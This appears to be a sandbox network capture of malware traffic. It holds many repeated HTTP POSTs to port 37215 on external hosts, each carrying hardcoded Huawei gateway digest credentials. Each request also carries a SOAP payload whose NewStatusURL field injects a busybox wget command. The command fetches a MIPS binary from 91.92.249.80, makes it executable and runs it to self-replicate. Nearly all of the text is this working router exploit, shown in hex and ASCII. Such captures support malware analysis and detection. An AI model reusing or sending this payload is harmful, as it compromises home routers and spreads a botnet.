                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          867192.168.2.233883641.47.175.637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.248028040 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          868192.168.2.2350222197.2.33.20837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.248054028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          869192.168.2.2344498197.16.249.12637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.248080015 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          870192.168.2.2354434197.112.161.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.248822927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          871192.168.2.2347852100.44.37.19037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.248848915 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          872192.168.2.235021441.213.186.24837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.248893023 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          873192.168.2.2343276157.13.206.14337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.249083042 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          874192.168.2.2360712197.194.178.19837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.249089956 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          875192.168.2.2357008197.73.235.16037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.249368906 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          876192.168.2.2339458157.152.252.25337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.249385118 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
